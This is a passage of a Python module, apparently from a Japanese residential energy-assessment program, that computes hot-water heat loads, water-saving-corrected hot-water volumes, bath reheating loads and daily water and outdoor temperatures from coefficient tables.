# ============================================================================
# 8. 節湯補正給湯熱負荷
# ============================================================================
def get_L_dash_k_d_t(W_dash_k_d_t, Theta_sw_k, Theta_wtr_d):
"""台所水栓における節湯補正給湯負荷 (MJ/h) (5a)
Args:
W_dash_k_d_t(ndarray): 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
Theta_sw_k(int): 台所水栓における基給湯量 (℃)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 台所水栓における節湯補正給湯負荷 (MJ/h)
"""
return W_dash_k_d_t * (Theta_sw_k - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3)
def get_L_dash_s_d_t(W_dash_s_d_t, Theta_sw_s, Theta_wtr_d):
"""浴室シャワー水栓における節湯補正給湯負荷 (5b)
Args:
W_dash_s_d_t(ndarray): 1時間当たりの浴室シャワーにおける節湯補正給湯量 (L/h)
Theta_sw_s(int): 浴室シャワーにおける基給湯量 (℃)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 浴室シャワーにおける節湯補正給湯負荷 (MJ/h)
"""
return W_dash_s_d_t * (Theta_sw_s - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3)
def get_L_dash_w_d_t(W_dash_w_d_t, Theta_sw_w, Theta_wtr_d):
"""洗面水栓における節湯補正給湯負荷 (5c)
Args:
W_dash_w_d_t(ndarray): 1時間当たりの洗面水栓における節湯補正給湯量 (L/d)
Theta_sw_w(int): 洗面水栓における基給湯量 (℃)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 洗面水栓における節湯補正給湯負荷 (MJ/d)
"""
return W_dash_w_d_t * (Theta_sw_w - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3)
def get_L_dash_bx_d_t(W_dash_b1_d_t, W_dash_b2_d_t, Theta_wtr_d, has_bath, bash_function):
"""浴槽水栓湯はり時における節水補正給湯熱負荷 L_dash_b1_d, L_dash_b2_d
Args:
W_dash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/d)
W_dash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はり時における節湯補正給湯量 (L/d)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
has_bath(bool): 浴室用の有無
bash_function(str): ふろ機能の種類
Returns:
ndarray: 浴槽水栓湯はり時・浴槽自動湯はり時における節水補正給湯熱負荷 (MJ/d)
"""
if has_bath == False:
L_dash_b1_d_t = np.zeros(24 * 365) # (5-1d)
L_dash_b2_d_t = np.zeros(24 * 365) # (5-1e)
return L_dash_b1_d_t, L_dash_b2_d_t
elif bash_function == '給湯単機能':
Theta_sw_b1 = get_Theta_sw_b1()
L_dash_b1_d_t = W_dash_b1_d_t * (Theta_sw_b1 - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3) # (5-2d)
L_dash_b2_d_t = np.zeros(24 * 365) # (5-2e)
return L_dash_b1_d_t, L_dash_b2_d_t
elif bash_function == 'ふろ給湯機(追焚あり)' or bash_function == 'ふろ給湯機(追焚なし)':
Theta_sw_b2 = get_Theta_sw_b2()
L_dash_b1_d_t = np.zeros(24 * 365) # (5-3d)
L_dash_b2_d_t = W_dash_b2_d_t * (Theta_sw_b2 - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3) # (5-3e)
return L_dash_b1_d_t, L_dash_b2_d_t
else:
raise ValueError(bash_function)
def get_L_dash_bax_d_t(W_dash_ba1_d_t, Theta_wtr_d, L_ba_d_t, has_bath, bash_function):
"""浴槽水栓さし湯時における節水補正給湯熱負荷 L_dash_ba1_d, L_dash_ba2_d
Args:
W_dash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
L_ba_d_t(ndarray): 1時間当たりの浴槽沸かし直しによる給湯熱負荷 (MJ/h)
has_bath(bool): 浴室等の有無
bash_function(str): ふろ機能の種類 (給湯単機能,ふろ給湯機(追焚なし),ふろ給湯機(追焚あり))
Returns:
ndarray: 浴槽水栓さし湯時/浴槽追焚時における節水補正給湯熱負荷 (MJ/h)
"""
if has_bath == False:
L_dash_ba1_d_t = np.zeros(24 * 365) # (5-1f)
L_dash_ba2_d_t = np.zeros(24 * 365) # (5-1g)
return L_dash_ba1_d_t, L_dash_ba2_d_t
elif bash_function == '給湯単機能' or bash_function == 'ふろ給湯機(追焚なし)':
Theta_sw_ba1 = get_Theta_sw_ba1()
L_dash_ba1_d_t = W_dash_ba1_d_t * (Theta_sw_ba1 - np.repeat(Theta_wtr_d, 24)) * 4.186 * 10 ** (-3) # (5-2f)
L_dash_ba2_d_t = np.zeros(24 * 365) # (5-2g)
return L_dash_ba1_d_t, L_dash_ba2_d_t
elif bash_function == 'ふろ給湯機(追焚あり)':
L_dash_ba1_d_t = np.zeros(24 * 365) # (5-3f)
L_dash_ba2_d_t = L_ba_d_t * 1.25 # (5-3g)
return L_dash_ba1_d_t, L_dash_ba2_d_t
else:
raise ValueError(bash_function)
def get_Theta_sw_k():
"""台所水栓の基準給湯温度
Args:
Returns:
int: 台所水栓の基準給湯温度
"""
return get_table_5()[0]
def get_Theta_sw_s():
"""浴室シャワー水栓の基準給湯温度
Args:
Returns:
int: 浴室シャワー水栓の基準給湯温度
"""
return get_table_5()[1]
def get_Theta_sw_w():
"""洗面水栓の基準給湯温度
Args:
Returns:
int: 洗面水栓の基準給湯温度
"""
return get_table_5()[2]
def get_Theta_sw_b1():
"""浴槽水栓湯はりの基準給湯温度
Args:
Returns:
int: 浴槽水栓湯はりの基準給湯温度
"""
return get_table_5()[3]
def get_Theta_sw_b2():
"""浴槽自動湯はりの基準給湯温度
Args:
Returns:
int: 浴槽自動湯はりの基準給湯温度
"""
return get_table_5()[4]
def get_Theta_sw_ba1():
"""浴槽水栓さし湯の基準給湯温度
Args:
Returns:
int: 浴槽水栓さし湯の基準給湯温度
"""
return get_table_5()[5]
def get_table_5():
"""表 5 用途ごとの基準給湯温度
Args:
Returns:
list: 用途ごとの基準給湯温度
"""
table_5 = [
40,
40,
40,
40,
40,
60
]
return table_5
# ============================================================================
# 9. 節湯補正給湯量
# ============================================================================
def calc_W_dash_k_d_t(W_k_d_t, kitchen_watersaving_A, kitchen_watersaving_C, pipe_diameter, Theta_wtr_d):
"""1時間当たりの台所水栓における節湯補正給湯量 [L/h] (6a)
Args:
W_k_d_t(ndarray): 1時間当たりの台所水栓における基準給湯量 (L/h)
kitchen_watersaving_A(bool): 台所水栓の手元止水機能の有無
kitchen_watersaving_C(bool): 台所水栓の水優先吐水機能の有無
pipe_diameter(str): ヘッダー分岐後の径
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
"""
# 台所水栓における節湯の効果係数
f_sk = watersaving.get_f_sk(kitchen_watersaving_A, kitchen_watersaving_C, Theta_wtr_d)
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
return W_k_d_t * np.repeat(f_sk, 24) * f_sp
def calc_W_dash_s_d_t(W_s_d_t, shower_watersaving_A, shower_watersaving_B, pipe_diameter):
"""1時間当たりの浴室シャワーにおける節湯補正給湯量 (L/h) (6a)
Args:
W_s_d_t(ndarray): 浴室シャワーにおける基準給湯量 (L/h)
shower_watersaving_A(bool): 浴室シャワー水栓の手元止水機能の有無
shower_watersaving_B(bool): 浴室シャワー水栓の小流量吐水機能の有無
pipe_diameter(str): ヘッダー分岐後の径
Returns:
ndarray: 1時間当たりの浴室シャワーにおける節湯補正給湯量 (L/h)
"""
# 浴室シャワー水栓のける節湯の効果係数
f_ss = watersaving.get_f_ss(shower_watersaving_A, shower_watersaving_B)
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
return W_s_d_t * f_ss * f_sp
def calc_W_dash_w_d_t(W_w_d_t, washbowl_watersaving_C, pipe_diameter, Theta_wtr_d):
"""1時間当たりの台所水栓における節湯補正給湯量 (L/h) (6c)
Args:
W_w_d_t(ndarray): 台所水栓における基準給湯量 (L/h)
washbowl_watersaving_C(bool): 洗面水栓の水優先吐水機能の有無
pipe_diameter(str): ヘッダー分岐後の径
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 1時間当たりの台所水栓における節湯補正給湯量 (L/h)
"""
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
# 洗面水栓における節湯の効果係数
f_sw = watersaving.get_f_sw(washbowl_watersaving_C, Theta_wtr_d)
return W_w_d_t * np.repeat(f_sw, 24) * f_sp
def calc_W_dash_b1_d_t(W_b1_d_t, pipe_diameter):
"""1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h) (6d)
Args:
W_b1_d_t(ndarray): 浴槽水栓湯はり時における基準給湯量 (L/h)
pipe_diameter(str): ヘッダー分岐後の径
Returns:
ndarray: 1時間当たりの浴槽水栓湯はり時における節湯補正給湯量 (L/h)
"""
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
# 浴槽における節湯の効果係数
f_sb = watersaving.get_f_sb()
return W_b1_d_t * f_sp * f_sb
def calc_W_dash_b2_d_t(W_b2_d_t):
"""1時間当たりの浴槽自動湯はり時における節湯補正給湯量 (L/h) (6e)
Args:
W_b2_d_t(ndarray): 浴槽自動湯はり時における基準給湯量 (L/h)
Returns:
ndarray: 1時間当たりの浴槽自動湯はり時における節湯補正給湯量 (L/h)
"""
# 浴槽における節湯の効果係数
f_sb = watersaving.get_f_sb()
return W_b2_d_t * f_sb
def calc_W_dash_ba1_d_t(W_ba1_d_t, pipe_diameter):
"""1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h) (6f)
Args:
W_ba1_d_t(ndarray): 1時間当たりの浴室水栓さし湯時における基準給湯量 (L/h)
pipe_diameter(str): ヘッダー分岐後の径
Returns:
1時間当たりの浴槽水栓さし湯時における節湯補正給湯量 (L/h)
"""
# 配管における節湯の効果係数
f_sp = watersaving.get_f_sp(pipe_diameter)
return W_ba1_d_t * f_sp
# ============================================================================
# 10. 基準給湯量
# ============================================================================
def calc_W_k_d_t(n_p, schedule_hw):
"""1時間当たりの台所水栓における基準給湯量 (L/h) (7a)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
Returns:
ndarray: 1時間当たりの台所水栓における基準給湯量 (L/h)
"""
if n_p in [1, 2, 3, 4]:
return calc_W_k_p_d_t(n_p, schedule_hw)
elif 1 <= n_p and n_p <= 2:
W_k_1_d_t = calc_W_k_p_d_t(1, schedule_hw)
W_k_2_d_t = calc_W_k_p_d_t(2, schedule_hw)
return W_k_1_d_t * (2 - n_p) / (2 - 1) + W_k_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
W_k_2_d_t = calc_W_k_p_d_t(2, schedule_hw)
W_k_3_d_t = calc_W_k_p_d_t(3, schedule_hw)
return W_k_2_d_t * (3 - n_p) / (3 - 2) + W_k_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
W_k_3_d_t = calc_W_k_p_d_t(3, schedule_hw)
W_k_4_d_t = calc_W_k_p_d_t(4, schedule_hw)
return W_k_3_d_t * (4 - n_p) / (4 - 3) + W_k_4_d_t * (n_p - 3) / (4 - 3)
def calc_W_s_d_t(n_p, schedule_hw, has_bath):
"""1時間当たりの浴室シャワー水栓における基準給湯量 (7b)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間当たりの浴室シャワー水栓における基準給湯量 (L/h)
"""
if n_p in [1, 2, 3, 4]:
return calc_W_s_p_d_t(n_p, schedule_hw, has_bath)
elif 1 <= n_p and n_p <= 2:
W_s_1_d_t = calc_W_s_p_d_t(1, schedule_hw, has_bath)
W_s_2_d_t = calc_W_s_p_d_t(2, schedule_hw, has_bath)
return W_s_1_d_t * (2 - n_p) / (2 - 1) + W_s_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
W_s_2_d_t = calc_W_s_p_d_t(2, schedule_hw, has_bath)
W_s_3_d_t = calc_W_s_p_d_t(3, schedule_hw, has_bath)
return W_s_2_d_t * (3 - n_p) / (3 - 2) + W_s_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
W_s_3_d_t = calc_W_s_p_d_t(3, schedule_hw, has_bath)
W_s_4_d_t = calc_W_s_p_d_t(4, schedule_hw, has_bath)
return W_s_3_d_t * (4 - n_p) / (4 - 3) + W_s_4_d_t * (n_p - 3) / (4 - 3)
def calc_W_w_d_t(n_p, schedule_hw):
"""1時間当たりの洗面水栓における基準給湯量 (7c)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
Returns:
ndarray: 1時間当たりの洗面水栓における基準給湯量 (L/h)
"""
if n_p in [1, 2, 3, 4]:
return calc_W_w_p_d_t(n_p, schedule_hw)
elif 1 <= n_p and n_p <= 2:
W_w_1_d_t = calc_W_w_p_d_t(1, schedule_hw)
W_w_2_d_t = calc_W_w_p_d_t(2, schedule_hw)
return W_w_1_d_t * (2 - n_p) / (2 - 1) + W_w_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
W_w_2_d_t = calc_W_w_p_d_t(2, schedule_hw)
W_w_3_d_t = calc_W_w_p_d_t(3, schedule_hw)
return W_w_2_d_t * (3 - n_p) / (3 - 2) + W_w_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
W_w_3_d_t = calc_W_w_p_d_t(3, schedule_hw)
W_w_4_d_t = calc_W_w_p_d_t(4, schedule_hw)
return W_w_3_d_t * (4 - n_p) / (4 - 3) + W_w_4_d_t * (n_p - 3) / (4 - 3)
else:
raise ValueError(n_p)
def get_schedule_pattern_list():
"""生活スケジュールパターン
Args:
Returns:
list: 生活スケジュールパターン
"""
ptn_list = [
'休日在宅(大)',
'休日在宅(小)',
'平日(大)',
'平日(中)',
'平日(小)',
'休日外出'
]
return ptn_list
def calc_W_k_p_d_t(p, schedule_hw):
"""1時間当たりの居住人数がp人における台所水栓における基準給湯量
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
Returns:
ndarray: 1時間当たりの居住人数がp人における台所水栓における基準給湯量 (L/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
W_k_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
W_k_p_d_t[f] = np.tile(table[i][:, 0], 365)[f]
return W_k_p_d_t
def calc_W_s_p_d_t(p, schedule_hw, has_bath):
"""1時間当たりの居住人数がp人における浴室シャワー水栓における基準給湯量
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath: returns: 1時間当たりの居住人数がp人における洗面シャワー水栓における基準給湯量 (L/h)
Returns:
ndarray: 1時間当たりの居住人数がp人における洗面シャワー水栓における基準給湯量 (L/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
W_s_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# 表6で読み取るべき列インデックス
j = 1 if has_bath else 2
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
W_s_p_d_t[f] = np.tile(table[i][:, j], 365)[f]
return W_s_p_d_t
def calc_W_w_p_d_t(p, schedule_hw):
"""1時間あたりの居住人数がp人における洗面水栓における基準給湯量
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
Returns:
ndarray: 1日当たりの居住人数がp人における洗面水栓における基準給湯量 (L/d)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
W_w_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
W_w_p_d_t[f] = np.tile(table[i][:, 3], 365)[f]
return W_w_p_d_t
def calc_W_b1_d_t(n_p, schedule_hw, has_bath, bath_function):
"""浴槽水栓湯はり時における給湯基準量 (L/h)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
bath_function(str): ふろ機能の種類
Returns:
ndarray: 浴槽水栓湯はり時における給湯基準量 (L/h)
"""
if bath_function == '給湯単機能':
return calc_W_b_d_t(n_p, schedule_hw, has_bath)
elif bath_function == 'ふろ給湯機(追焚なし)' or bath_function == 'ふろ給湯機(追焚あり)':
return np.zeros(24 * 365)
else:
raise ValueError(bath_function)
def calc_W_b2_d_t(n_p, schedule_hw, has_bath, bath_function):
"""浴槽自動湯はり時における給湯基準量 (L/h)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
bath_function(str): ふろ機能の種類
Returns:
ndarray: 浴槽自動湯はり時における給湯基準量 (L/d)
"""
if bath_function == 'ふろ給湯機(追焚なし)' or bath_function == 'ふろ給湯機(追焚あり)':
return calc_W_b_d_t(n_p, schedule_hw, has_bath)
elif bath_function == '給湯単機能':
return np.zeros(24 * 365)
else:
raise ValueError(bath_function)
def calc_W_b_d_t(n_p, schedule_hw, has_bath):
"""1時間当たりの浴槽湯はり時における基準給湯量 (L/h) (8)
Args:
n_p(float): 仮想居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間あたりの浴槽湯はり時における基準給湯量 (L/h)
"""
if n_p in [1, 2, 3, 4]:
return calc_W_b_p_d_t(n_p, schedule_hw, has_bath)
if 1 <= n_p and n_p <= 2:
W_b_1_d_t = calc_W_b_p_d_t(1, schedule_hw, has_bath)
W_b_2_d_t = calc_W_b_p_d_t(2, schedule_hw, has_bath)
return W_b_1_d_t * (2 - n_p) / (2 - 1) + W_b_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
W_b_2_d_t = calc_W_b_p_d_t(2, schedule_hw, has_bath)
W_b_3_d_t = calc_W_b_p_d_t(3, schedule_hw, has_bath)
return W_b_2_d_t * (3 - n_p) / (3 - 2) + W_b_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
W_b_3_d_t = calc_W_b_p_d_t(3, schedule_hw, has_bath)
W_b_4_d_t = calc_W_b_p_d_t(4, schedule_hw, has_bath)
return W_b_3_d_t * (4 - n_p) / (4 - 3) + W_b_4_d_t * (n_p - 3) / (4 - 3)
else:
raise ValueError(n_p)
def calc_W_b_p_d_t(p, schedule_hw, has_bath):
"""1時間あたりの居住人数がp人における浴槽湯はり時における基準給湯量
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間あたりの居住人数がp人における浴槽湯はり時における基準給湯量 (L/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
W_b_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# 読み取るべき表の列インデックス
j = 4 if has_bath else 5
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
W_b_p_d_t[f] = np.tile(table[i][:, j], 365)[f]
return W_b_p_d_t
def calc_n_b_p_d_t(p, schedule_hw, has_bath):
"""1時間あたりの居住人数がp人における入浴人数(人/h)
Args:
p(float): 居住人数 (人)
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
Returns:
ndarray: 1時間あたりの居住人数がp人における入浴人数(人/h)
"""
# 読み取るべき表の選択
table = schedule.get_table_m_for_p(p)
# 作業用
n_b_p_d_t = np.zeros(24 * 365)
# 生活スケジュールパターン
ptn_list = get_schedule_pattern_list()
# 読み取るべき表の列インデックス
j = 6 if has_bath else 7
# パターンごとに合算
for i, ptn in enumerate(ptn_list):
f = np.repeat(schedule_hw == ptn, 24)
n_b_p_d_t[f] = np.tile(table[i][:, j], 365)[f]
return n_b_p_d_t
def calc_W_ba1_d_t(bath_function, L_ba_d_t, Theta_wtr_d):
"""浴槽水栓さし湯時における基準給湯量 (L/h) (9)
Args:
bath_function(str): ふろ機能の種類
L_ba_d_t(ndarray): 1時間当たりの浴槽沸かし直しによる給湯熱負荷 (MJ/h)
Theta_wtr_d(ndarray): 日平均給水温度 (℃)
Returns:
ndarray: 浴槽水栓さし湯時における基準給湯量 (L/h)
"""
if bath_function == '給湯単機能' or bath_function == 'ふろ給湯機(追焚なし)':
# 浴槽水栓さし湯時における基準給湯温度
Theta_sw_ba1 = get_Theta_sw_ba1()
return L_ba_d_t * (1.0 / (Theta_sw_ba1 - np.repeat(Theta_wtr_d, 24))) * (1.0 / 4.186) * 10 ** 3
elif bath_function == 'ふろ給湯機(追焚あり)':
return np.zeros(24 * 365)
else:
raise ValueError(bath_function)
# ============================================================================
# 11. 浴槽沸かし直しによる給湯熱負荷
# ============================================================================
def calc_L_ba_d_t(bath_insulation, schedule_hw, has_bath, theta_ex_d_Ave_d, n_p):
"""浴槽沸かし直しによる給湯熱負荷 (MJ/h) (10)
Args:
bath_insulation(bool): 浴槽の断熱の有無
schedule_hw(ndarray): 給湯スケジュール
has_bath(bool): 浴室等の有無
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
n_p(float): 仮想居住人数
Returns:
ndarray: 浴槽沸かし直しによる給湯熱負荷 (MJ/d)
"""
if 1 <= n_p and n_p <= 2:
n_b_1_d_t = calc_n_b_p_d_t(1, schedule_hw, has_bath)
n_b_2_d_t = calc_n_b_p_d_t(2, schedule_hw, has_bath)
L_ba_1_d_ = calc_L_ba_p_d_t(1, bath_insulation, n_b_1_d_t, theta_ex_d_Ave_d)
L_ba_2_d_t = calc_L_ba_p_d_t(2, bath_insulation, n_b_2_d_t, theta_ex_d_Ave_d)
return L_ba_1_d_ * (2 - n_p) / (2 - 1) + L_ba_2_d_t * (n_p - 1) / (2 - 1)
elif 2 <= n_p and n_p <= 3:
n_b_2_d_t = calc_n_b_p_d_t(2, schedule_hw, has_bath)
n_b_3_d_t = calc_n_b_p_d_t(3, schedule_hw, has_bath)
L_ba_2_d_t = calc_L_ba_p_d_t(2, bath_insulation, n_b_2_d_t, theta_ex_d_Ave_d)
L_ba_3_d_t = calc_L_ba_p_d_t(3, bath_insulation, n_b_3_d_t, theta_ex_d_Ave_d)
return L_ba_2_d_t * (3 - n_p) / (3 - 2) + L_ba_3_d_t * (n_p - 2) / (3 - 2)
elif 3 <= n_p and n_p <= 4:
n_b_3_d_t = calc_n_b_p_d_t(3, schedule_hw, has_bath)
n_b_4_d_t = calc_n_b_p_d_t(4, schedule_hw, has_bath)
L_ba_3_d_t = calc_L_ba_p_d_t(3, bath_insulation, n_b_3_d_t, theta_ex_d_Ave_d)
L_ba_4_d_t = calc_L_ba_p_d_t(4, bath_insulation, n_b_4_d_t, theta_ex_d_Ave_d)
return L_ba_3_d_t * (4 - n_p) / (4 - 3) + L_ba_4_d_t * (n_p - 3) / (4 - 3)
else:
raise ValueError(n_p)
def calc_L_ba_p_d_t(p, bath_insulation, n_b_p_d_t, theta_ex_d_Ave_d):
"""居住人数がp人における浴槽沸かし直しにおける給湯熱負荷 (11)
Args:
p(float): 居住人数 (人)
bath_insulation(bool): 浴槽の断熱の有無
n_b_p_d_t(ndarray): 居住人数p人における入浴人数(人/h)
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
ndarray: 居住人数がp人における浴槽沸かし直しにおける給湯熱負荷 (MJ/d)
"""
# 係数a_ba, b_ba
a_ba_p_d, b_ba_p_d = get_coeff_eq11(bath_insulation, p, theta_ex_d_Ave_d)
# 24時間化
a_ba_p_d = np.repeat(a_ba_p_d, 24)
b_ba_p_d = np.repeat(b_ba_p_d, 24)
theta_ex_d_Ave_d = np.repeat(theta_ex_d_Ave_d, 24)
# 浴槽沸かし直しによよる給湯熱負荷 (MJ/h) (11)
# L_ba_p_d_t の作業領域確保
L_ba_p_d_t = np.zeros(24 * 365)
# 1日あたりののべ入浴人数
n_b_p_d = np.repeat(np.sum(n_b_p_d_t.reshape(365, 24), axis=1), 24)
# W_b_p_d > = 0 の場合
f1 = (n_b_p_d > 0)
L_ba_p_d_t[f1] = (a_ba_p_d[f1] * theta_ex_d_Ave_d[f1] + b_ba_p_d[f1]) * (n_b_p_d_t[f1] / n_b_p_d[f1])
# W_b_p_d = 0 の場合
f2 = (n_b_p_d == 0)
L_ba_p_d_t[f2] = 0
return L_ba_p_d_t
def get_coeff_eq11(bath_insulation, p, theta_ex_d_Ave_d):
"""係数a_ba, b_ba
Args:
bath_insulation(bool): 浴槽の断熱の有無
p(float): 居住人数 (人)
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
tuple: 係数a_ba, b_ba
"""
if bath_insulation == False:
# 通常浴槽
y_off = 0
elif bath_insulation == True:
# 高断熱浴槽
y_off = 1
else:
raise ValueError(bath_insulation)
x_off = (4 - p) * 2
# 7度未満
tmp_a = ([get_table_6()[y_off][x_off + 0]] * 365) * (theta_ex_d_Ave_d < 7.0)
tmp_b = ([get_table_6()[y_off][x_off + 1]] * 365) * (theta_ex_d_Ave_d < 7.0)
# 7度以上かつ16度未満
tmp_a = tmp_a + ([get_table_6()[y_off + 2][x_off + 0]] * 365) * (7.0 <= theta_ex_d_Ave_d) * (theta_ex_d_Ave_d < 16.0)
tmp_b = tmp_b + ([get_table_6()[y_off + 2][x_off + 1]] * 365) * (7.0 <= theta_ex_d_Ave_d) * (theta_ex_d_Ave_d < 16.0)
# 16度以上かつ25度未満
tmp_a = tmp_a + ([get_table_6()[y_off + 4][x_off + 0]] * 365) * (16.0 <= theta_ex_d_Ave_d) * (theta_ex_d_Ave_d < 25.0)
tmp_b = tmp_b + ([get_table_6()[y_off + 4][x_off + 1]] * 365) * (16.0 <= theta_ex_d_Ave_d) * (theta_ex_d_Ave_d < 25.0)
# 25度以上
tmp_a = tmp_a + ([get_table_6()[y_off + 6][x_off + 0]] * 365) * (25.0 <= theta_ex_d_Ave_d)
tmp_b = tmp_b + ([get_table_6()[y_off + 6][x_off + 1]] * 365) * (25.0 <= theta_ex_d_Ave_d)
return tmp_a, tmp_b
def get_table_6():
"""表6 係数 a_ba, b_ba
Args:
Returns:
list: 係数 a_ba, b_ba
"""
table_6 = [
(-0.12, 6.00, -0.10, 4.91, -0.06, 3.02, 0.00, 0.00),
(-0.07, 3.98, -0.06, 3.22, -0.04, 2.01, 0.00, 0.00),
(-0.13, 6.04, -0.10, 4.93, -0.06, 3.04, 0.00, 0.00),
(-0.08, 4.02, -0.06, 3.25, -0.04, 2.03, 0.00, 0.00),
(-0.14, 6.21, -0.11, 5.07, -0.07, 3.13, 0.00, 0.00),
(-0.09, 4.19, -0.07, 3.39, -0.04, 2.12, 0.00, 0.00),
(-0.12, 5.81, -0.10, 4.77, -0.06, 2.92, 0.00, 0.00),
(-0.07, 3.80, -0.06, 3.09, -0.04, 1.92, 0.00, 0.00)
]
return table_6
# ============================================================================
# 12. 日平均給水温度
# ============================================================================
def get_Theta_wtr_d(region, Theta_ex_prd_Ave_d):
"""日平均給水温度 (℃) (12)
Args:
region(int): 省エネルギー地域区分
Theta_ex_prd_Ave_d(ndarray): 期間平均外気温度 (℃)
Returns:
ndarray: 日平均給水温度 (℃)
"""
# 日平均給水温度を求める際の会期係数
a_wtr, b_wtr = get_table_7()[region - 1]
# 日平均給水温度 (12)
Theta_wtr_d = np.clip(a_wtr * Theta_ex_prd_Ave_d + b_wtr, 0.5, None)
return Theta_wtr_d
def get_table_7():
"""表 7 日平均給水温度を求める際の回帰係数の値
Args:
Returns:
list: 日平均給水温度を求める際の回帰係数の値
"""
table_7 = [
(0.6639, 3.466),
(0.6639, 3.466),
(0.6054, 4.515),
(0.6054, 4.515),
(0.8660, 1.665),
(0.8516, 2.473),
(0.9223, 2.097),
(0.6921, 7.167)
]
return table_7
def get_Theta_ex_prd_Ave_d(theta_ex_d_Ave_d):
"""期間平均外気温度 (℃) (13)
Args:
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
ndarray: 期間平均外気温度 (℃)
"""
# 10日前までを拡張した配列を作る(最終日は削る=>-1)
tmp = np.zeros(365 + 10 - 1)
tmp[0:10] = theta_ex_d_Ave_d[-10:]
tmp[10:] = theta_ex_d_Ave_d[0:364]
# 畳み込み演算
# 10日分のデータにそれぞれ0.1を掛けて加算する→平均が求まる
Theta_ex_prd_Ave_d = np.convolve(tmp, [0.1] * 10, mode='valid')
return Theta_ex_prd_Ave_d
# ============================================================================
# 13. 日平均外気温度
# ============================================================================
def get_theta_ex_d_Ave_d(Theta_ex_d_t):
"""日平均外気温度 (℃) (14)
Args:
Theta_ex_d_t(ndarray): 外気温度 (℃)
Returns:
ndarray: 日平均外気温度 (℃)
"""
# 8760時間の一次配列を365*24の二次配列へ再配置させる
tmp = Theta_ex_d_t.reshape(365, 24)
# 二次元目を加算することで二次元目を消滅させる
tmp = np.sum(tmp, axis=1)
# 24で割ることで平均化する
theta_ex_d_Ave_d = tmp / 24
return theta_ex_d_Ave_d
# ============================================================================
# 14. 夜間平均外気温度
# ============================================================================
def get_Theta_ex_Nave_d(Theta_ex_d_t):
